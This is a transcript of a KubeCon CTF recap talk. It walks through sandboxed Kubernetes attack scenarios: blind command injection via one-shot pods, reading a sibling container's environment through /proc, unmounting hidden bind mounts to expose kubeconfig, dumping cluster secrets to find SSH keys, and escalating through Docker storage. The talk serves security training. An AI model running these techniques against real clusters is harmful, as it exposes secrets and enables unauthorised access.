Description
Don’t miss out! Join us at our upcoming event: KubeCon + CloudNativeCon North America 2021 in Los Angeles, CA from October 12-15. Learn more at https://kubecon.io. The conference features presentations from developers and end users of Kubernetes, Prometheus, Envoy, and all of the other CNCF-hosted projects.
Capture The Flag Summary + Wrap Up, Virtual - Andrew Martin, Lewis Denham-Parry
B
Fabulous and wonderful, welcome to the Cloud Native Security Day CTF outro. Oh, he says outro, and this is the recap. There we are: welcome to the recap. We will do a post-cap recap, a decap: walk through what we did today and go under the hood to explain some of the attacks.
B
Peace, indeed, is never an option for a naughty goose, and today we were off hunting clusters in the wild. But actually it was not the public internet we were using; it was a far more constrained environment, whereby we stood everything up in order to practice and learn in a safe place. So every cluster had a bastion host, and every cluster was inaccessible from the public internet.
B
And we'll do a pwn demo of, well, as you say, everything that we were doing. So we will start off.
A
Sorry, yeah, so I think we're going to start off with scenario three, which is Avalanche. Earlier on today we had two separate Twitch streams: in the first Twitch stream we went through scenario one, and they'll be available for you to review, and then in the afternoon Twitch stream we went through scenario five. So without further ado, I'll pass back to Mr Andrew Martin to show us a way through scenario three, which was called Avalon.
B
Thank you very much. So the purpose of this, excuse me, the purpose of this is: we trust, within our private networks, that our own container registries hold code that we believe is safe to use. So we've deployed an image from our private registry, but the pirate Captain Hashjack and his nefarious crew have taken the registry down, so we can no longer get images from it. But there's a secret in one of those deployed images.
B
So
let's
have
a
look
for
the
secret
key
to
unlock
the
plug
in
the
bottom
of
the
captain's
prize
ship
and
hopefully
scuttle
it
so
we're
in
the
hash
jackpot
in
the
avalon
namespace.
B
So, let's see what access we've got. Well, we can hit the API server; we can see in the env that we've got routing to these things. It is the Bitnami kubectl image, thank you very much, Bitnami. That probably means it's relatively well configured from a file system perspective. What does that mean? It means that we're UID 1001 but group ID zero. Does that show us anything? Well, actually, there is no user at 1001, so that means that our file system access is going to be difficult. It's also why we see...
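The identity and routing checks described here can be sketched as a couple of shell commands run inside the pod (a hedged reconstruction, not the verbatim on-stream commands; the environment variable names are the standard ones Kubernetes injects):

```shell
# Who are we? On the Bitnami kubectl image we expect a non-root UID
# (1001) with group 0, and no matching passwd entry for that UID.
id

# Kubernetes injects the in-cluster API server address into every
# pod's environment, so routing to it can be confirmed from env alone.
# (Prints nothing when run outside a cluster.)
env | grep KUBERNETES_SERVICE || true
```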
B
Okay, so we do have kubectl, and this is probably a bad day for cluster administrators. What pods do we have? Okay, so we can see already that we've got three privateer pods, and if we try and do this across all namespaces, excuse me, that's not quite how you spell namespaces, then we can see here: we have a Forbidden, and the API server has leaked our service account name and the namespace back to us.
B
So we can't list pods across all namespaces, fine, but we do have access to our own local namespace. So what do we know about the scenario? Well, just going back to the beginning, we can see there's a secret in one of the deployed images, and we've got access to these pods. How do we find out what images they're running?
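In command form, the sequence described here looks roughly like this (hedged: the jsonpath query is one common way to list pod images, not necessarily the exact command used on stream):

```shell
# Listing pods in our own namespace is allowed by our role.
kubectl get pods

# Across all namespaces it is forbidden; note how the error
# message leaks our service account name and namespace back to us.
kubectl get pods --all-namespaces

# Pull the image for each pod we *can* see, to find the one
# deployed from the private registry.
kubectl get pods -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].image}{"\n"}{end}'
```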
B
So what can we do here? Well, we're looking for something in the file system of a pod, of an image, rather. We can't get that image, because it's from a private registry, so the only thing we can do here is to execute something inside the pod that will reveal unto us the actual flag on the file system. So...
B
Let us say the pod is going to be called test, and we'll give it a random name so that we can use the bash built-in RANDOM variable, so that we get, excuse me, so that we get a different name every time. Then that's our pod name, and then the command we want to run is probably bash, and then let's just get our id. And then, once we've done that, give it a few seconds for the pod to start, and then kubectl logs on the pod, just to see what happens.
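A sketch of that one-shot pod, using bash's built-in RANDOM for a fresh name on every attempt (the cluster-side commands are shown as comments because they need the scenario's cluster, and the image reference would be one of the already-deployed private images):

```shell
# Unique pod name per attempt, via bash's built-in RANDOM.
POD="test-$RANDOM"
echo "$POD"

# Then, inside the scenario (requires cluster access):
#   kubectl run "$POD" --restart=Never \
#     --image=<one of the deployed private images> -- bash -c 'id'
#   sleep 5                # give the pod a moment to start
#   kubectl logs "$POD"    # blind: output is only visible via logs
```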
A
So, Andy, the way that I did this earlier was just to, in the sleep command during it, write out those logs as you've done, but then kubectl logs on the pod and write it to a dump, so /tmp/dump, and then to cat it out from there. That's how I...
B
So, let's just do shell command id, make sure that we have something.
B
Okay, so it was because I tried to attach a terminal to it. So, let's get back to where we were: command id, and then we'll pull the logs.
B
Okay, but we do need to leave a few seconds for the pod to actually start; this is a kind of blind injection attack against the pod. There we go, so now we can execute commands within this one-shot container. In the interests of the time that I've wasted, that you will never get back, let's grep for the flag with my favorite one-liner, which looks a bit like this, so we're going to find something.
B
Now, we happen to know that it's in the temp directory, to save us a little bit of time, and that hopefully should now dump out a flag, if I'm being sensible. And, as people have pointed out before, we don't have to use find here, we do have to... oh, no, that's not correct. Sorry! We do want to search this.
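The find-and-grep one-liner is along these lines (a reconstruction, not the verbatim command; the flag marker string and the planted demo file are assumptions so the example runs anywhere, whereas in the scenario the file already sat somewhere under /tmp):

```shell
# Demo setup: plant a fake flag the way the scenario hides one in /tmp.
mkdir -p /tmp/ctf-demo
echo 'flag{0n3-sh0t-c0nta1ner}' > /tmp/ctf-demo/.hidden

# The one-liner: walk the directory, grep every regular file for the
# flag marker, and print the matching file's contents.
find /tmp/ctf-demo -type f -exec grep -l 'flag{' {} \; -exec cat {} \;
```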
B
Okay,
finally,
use
a
share,
never
going
to
make
you
this
smells
of
lewis
denim
paris
cluster
perturbering,
but
there
is
our
flag,
finally
hidden
in
some
nefarious
local
coil
system
and
we've
pulled
that
from
inside
the
container.
Now
that
puts
us
slightly
behind
time.
So,
let's
see
how
quickly.
A
...we can get through the next. So, whilst you get that next one set up: yes, Val, it is my calling card to rickroll whenever I get into a cluster or these scenarios. Again, we're tight on time today, so we're going to see if we can get to the second, but Andy, whenever you're ready to go, give me a shout. And I think we're going to go on to scenario four now.
B
Okay, so what are we doing here? The supply chain is compromised: who would have thought such a thing? Hashjack and the motley crew have managed to get code merged into the application library that developers use. The library runs in a pod, and attackers have then escalated, trying to find secrets on the host.
B
So what do we know here? Well, we know that we have two unknown containers, from the starting point, in the process-audit pod. So, again, we'll just do the standard checks, just see what exists here. We have...
B
We have a service account. We don't have kubectl; we could install it, but let's look at some other things.
B
That is generally a bad day, because once we share process namespaces, we share /proc, and /proc gives us access to all the good stuff. So we can now see, for example, how that process was invoked, and actually we need to do some null-bytes fixing so it's visible. So we've got sleep infinity in there, so we know that it's process 11. Here's 11, we've got the right one, okay. So what else could we look for in here?
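Reading the neighbouring container's command line goes via the shared /proc, and the entries are NUL-delimited, hence the fix-up with tr. A sketch (PID 11 is the scenario's; the stand-in below fakes the file so the transformation runs anywhere):

```shell
# /proc/<pid>/cmdline is NUL-delimited; tr makes it readable.
# In the scenario, with a shared process namespace:
#   tr '\0' ' ' < /proc/11/cmdline
# Stand-in that runs anywhere -- fake the file, apply the same fix:
printf 'sleep\0infinity\0' > /tmp/cmdline-demo
tr '\0' ' ' < /tmp/cmdline-demo
# -> sleep infinity
```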
B
Well, we have access to the entire root file system of that process, which, of course, is a joy for all to behold.
B
But what are we looking for here? Well, actually, in this case, we are looking for perhaps something in the environment, so again we're looking in the environment of the other container in the pod. There are two containers in this pod, and this one is giving us some useful information. Again, things are null-byte delimited, and there, joy of joys, is something that looks suspiciously like a flag. Happy days. There we go, on to the next.
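The same NUL-delimiter trick applies to the other container's environment (hedged sketch; the real path was the neighbouring process's /proc/<pid>/environ, readable thanks to the shared process namespace, and the variable name here is a stand-in):

```shell
# /proc/<pid>/environ is also NUL-delimited. In the scenario:
#   tr '\0' '\n' < /proc/11/environ | grep -i flag
# Stand-in demonstrating the same transformation:
printf 'PATH=/usr/bin\0FLAG=flag{in-the-environment}\0' > /tmp/environ-demo
tr '\0' '\n' < /tmp/environ-demo | grep '^FLAG='
# -> FLAG=flag{in-the-environment}
```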
A
So, whilst you get set up for that, some honorable mentions for today: we had Chris Stuffedwell D, Noel Mahey, we had Yuval, all just smashing through the scenarios. Thank you to Wallet as well, who, I feel, is the community support officer. So thank you ever so much for the channel, Lena.
B
Excellent. Okay, so the cluster is almost about to die as well, because it's an old one. So what are we going to do? Well, the environment doesn't give us much; kubectl has no local routing. Okay, so in this case, again, I'd like to check the mount points. This is not something that we would expect to see, so let's unmount whatever is bind mounted over /root/.kube. Have a look: there's still nothing there. Why might that be?
B
Because there are two bind mounts. Okay, and then let's just double check that the mounts are actually gone. Yeah, there's nothing there anymore. Bind mounts are just a way of hiding things on a file system; you can hide processes as well, but in this case we were hiding /root/.kube, and now we've got kubectl access, and there we go: we can route to the master, the API server.
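The unmount dance described here, sketched as commands (hedged: this assumes root on the compromised host; two stacked bind mounts means two umounts before the real directory shows through):

```shell
# Is anything bind-mounted over the kubeconfig directory?
grep '/root/.kube' /proc/mounts

# Two stacked bind mounts: unmount twice, then verify nothing is left.
umount /root/.kube
umount /root/.kube
grep '/root/.kube' /proc/mounts || echo "no mounts left"

# With the real /root/.kube visible again, kubectl can route to the
# API server on the master.
kubectl get nodes
```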
B
It
is
to
find
where
hashtag
has
hidden
his
ill-gotten
treasure
in
a
hard-to-find
place.
Okay,
so,
first
of
all,
we
probably
want
to
get
onto
the
master,
but
we
don't
know
how
we
can
do
that
easily.
Let's
see
if
we
can
get
any
secrets.
B
Irredeemable,
villainy
and
pseudo-reminiscent
are
both
potential
candidates.
But
of
course,
if
we
have
access
to
all
name
spaces,
let's
just
take
that
one
down
two
down.
We
can
see
there's
a
fair
bit
more
in
here,
so
noticeably
some
of
these
controller
tokens
are
masquerading,
so
that
suggests
that
it's
a
service
account
token,
but
it's
not
that
is
created
by
a
human.
B
In
the
same
way,
these
default
tokens-
that's
not
how
it
should
be
so
subcompensatory
super
averageness,
let's
see
if
we
can
figure
out
which
of
these
actually
holds
the
the
token.
So
what
are
we
going
to
do?
Let's,
let's
get
a
secret
and
I
will
be
honest
lewis
I
I'm
not
actually
sure
which
is
what.
A
So what I did, Andy, when you dropped this one on me, was to go all-namespaces, get secrets, hyphen-o yaml, and then just grep from that, because it will give you everything, so grep ssh, I think, yeah.
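Lewis's approach in command form (a sketch; which secret actually holds the SSH material is scenario-specific):

```shell
# Dump every secret in every namespace as YAML, then grep for
# anything that looks like SSH key material.
kubectl get secrets --all-namespaces -o yaml | grep -i ssh

# The master's IP comes from the node listing.
kubectl get nodes -o wide
```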
A
So if you've got the master IP node, if you have a master IP from doing kubectl get nodes, hyphen-o wide, and, oh, there you...
B
So, had we done this beforehand, we may have then thought about trying to find SSH keys, which at this point we have done anachronously. But so we now have access to this. We also know, from running kubectl version, what the master appears...
A
We want to inspect that image, and we want to find where the diff is, so nice, and then we want to gain access to that diff. But to be able to do so, we don't have sudo access on this. So, if we remember back to the first scenario of today, we showed you how to get privileged access if you run a privileged container. So let's, if we could, just loop back to trying to do a docker run to run a privileged... I can't.
B
So it first says this: the /var/lib/docker location is on the host, it's on the host file system, which we're on, but it's owned by root. So that means that we have to escalate. We can do that through a container, or we can just mount the file system, as we're about to do here. So we've mounted the... so if we go into the host, there we go. So now we should have access to this.
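The image-diff hunt can be sketched like this (hedged: it assumes the overlay2 storage driver and that we are root on, or mounted into, the host file system as set up above; the image name is a placeholder):

```shell
# From the host file system: find the image's top-layer diff
# directory under /var/lib/docker (root-owned, hence the escalation).
docker image inspect <image> --format '{{ .GraphDriver.Data.UpperDir }}'

# List what that top layer actually adds -- in the scenario, a single
# hidden file whose contents were the flag.
ls -laR "$(docker image inspect <image> --format '{{ .GraphDriver.Data.UpperDir }}')"
```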
B
Okay,
yes,
it's
the
directory
and
then
proc
self
command
line
is
the
only
file
hidden
in
the
container
image,
and
therein
lies
the
flag
that
was
a
speed,
run
and
a
half.
There
are
a
couple
more
that
you
can
see
that
were
on
the
live
streams
earlier
and
I
hope
that's
been
at
least
vaguely
informative,
if
not
a
little
bit
too
fast
to
follow.
B
That's
an
excellent
point,
and
there
are
the
thank
yous.
Yes,
indeed,
thank
you
to
everybody.
Who's
helped
putting
everything
together
and
also
the
organizers
the
work
done
to
get
today,
smooth
and
speed,
bump,
free
and
and
control
plane.
Folks,
who've
been
laboring
on
the
back
end
past
and
present.
Thanks
to
you
all.
B
There
is
the
the
great
passing
of
the
seas,
some
attendees
enjoyed
themselves
and
yes,
of
course,
don't
put
kubernetes
api
servers
on
the
public
internet
control
plane.
Does
this
for
a
living?
If
you'd
like
us
to
run
a
ctf
for
you,
or
indeed
you'd
like
to
attend
some
of
the
sans
training
courses,
then
please
do
reach
out
to
the
relevant
channels
and
thank
you
very
much
for
playing
have
a
wonderful
day.